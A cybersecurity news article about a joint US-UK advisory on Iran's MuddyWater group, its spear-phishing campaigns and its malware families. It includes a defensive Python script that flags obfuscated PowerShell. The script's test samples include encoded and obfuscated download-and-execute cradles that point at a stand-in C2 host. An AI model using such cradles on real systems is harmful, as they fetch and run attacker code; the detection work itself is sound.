Iran’s MuddyWater Hacker Group Using New Malware in Worldwide Cyber Attacks

According to cybersecurity agencies from the U.K. and the U.S., Iran’s MuddyWater hacking group is using new malware in worldwide cyber attacks.

A joint advisory released by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Cyber Command Cyber National Mission Force (CNMF), and the U.K.’s National Cyber Security Centre (NCSC) said, “MuddyWater actors are positioned both to provide stolen data and access to the Iranian government and to share these with other malicious cyber actors.”

The MuddyWater hacking group is known for conducting malicious operations as part of Iran’s Ministry of Intelligence and Security (MOIS), targeting a wide range of government and private-sector organizations, including the telecommunications, defense, local government, and oil and natural gas sectors, in Asia, Africa, Europe, and North America.

The group has also operated under numerous names, including Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros, and has been carrying out cyber espionage in support of MOIS objectives since roughly 2018.

The group is known to exploit publicly reported vulnerabilities and has a history of using open-source tools to gain access to sensitive data, deploy ransomware, and achieve persistence on victim networks.

Cisco Talos last month uncovered a previously undocumented malware campaign aimed at Turkish private organizations and governmental institutions with the goal of deploying a PowerShell-based backdoor.

Security agencies have now recovered evidence of similar tactics, in which obfuscated PowerShell scripts are used to conceal the most damaging parts of the attacks, including command-and-control (C2) functions.
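Obfuscated PowerShell of the kind described above is usually a defender’s first detection opportunity, because the command line itself carries the tell-tale signs even when the payload is hidden. The following Python triage script is an added example, not code from the advisory or this article: it scores constructed command-line samples against a handful of obfuscation indicators (encoded commands, hidden windows, backtick escapes, char-code assembly, string concatenation, download cradles) and decodes any -EncodedCommand payload so the same indicators can be applied to the hidden script. The indicator names, the threshold, and all sample values are this example’s own choices.

```python
import base64
import re
from typing import List, Optional, Tuple

# Indicator patterns; the names and the triage threshold are this example's own.
INDICATORS = {
    "encoded_command": re.compile(r"-(?:e|ec|en|enc|encodedcommand)\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I),
    "backtick_escapes": re.compile(r"`[a-z]", re.I),
    "char_casts": re.compile(r"\[char\]\s*\d+", re.I),
    "string_concat": re.compile(r"['\"]\s*\+\s*['\"]"),
    "download_cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest", re.I),
}

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), if any."""
    m = re.search(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not a well-formed payload; score the raw text only

def score(cmdline: str) -> Tuple[int, List[str]]:
    """Count indicators over the raw command line plus any decoded payload."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else f"{cmdline} {decoded}"
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    return len(hits), hits

def triage(cmdlines: List[str], threshold: int = 2) -> List[Tuple[str, List[str]]]:
    """Return the command lines whose indicator count reaches the threshold."""
    return [(c, score(c)[1]) for c in cmdlines if score(c)[0] >= threshold]

# Constructed samples for demonstration, not real MuddyWater artifacts.
PAYLOAD = "(New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLES = [
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    f"powershell.exe -w hidden -enc {ENCODED}",
    "powershell.exe -c \"$u='http://c2.exa'+'mple.invalid'; I`EX ([char]119+[char]105)\"",
]

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLES):
        print(f"{len(hits)} indicators {hits}: {cmd[:60]}")
```

The benign scripted backup in the first sample scores zero, while both obfuscated samples cross the threshold; in practice the indicator list would be tuned against an environment’s own baseline of legitimate PowerShell use.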

The cyberattacks are carried out via a spear-phishing campaign that attempts to coax targets into downloading suspicious ZIP archives containing either an Excel file with a malicious macro that communicates with the actor’s C2 server or a PDF file that drops a malicious payload onto the infected system.

The law enforcement agencies said, “Additionally, the group uses multiple malware sets — including PowGoop, Small Sieve, Canopy/Starwhale, Mori, and POWERSTATS — for loading malware, backdoor access, persistence, and exfiltration.”

Within this toolset, PowGoop functions as a loader responsible for downloading second-stage PowerShell scripts, while Small Sieve, described as a Python-based implant, is used to maintain a foothold in the network, leveraging the Telegram API for C2 communications to evade detection.

Additionally, a Windows Script File (.WSF) is used to collect and transmit system metadata to an adversary-controlled IP address, and two backdoors, Mori and POWERSTATS, are used to run commands received from the C2 server and maintain persistent access.

MuddyWater has also employed a survey script to enumerate information about victim computers. The collected information is sent back to the remote C2 server, and the survey script has also been deployed within a newly identified PowerShell backdoor that executes commands received from the attacker.

To obstruct potential attacks, the agencies have advised organizations to use multi-factor authentication wherever applicable, limit the use of administrator privileges, implement phishing protections, and prioritize patching known exploited vulnerabilities.
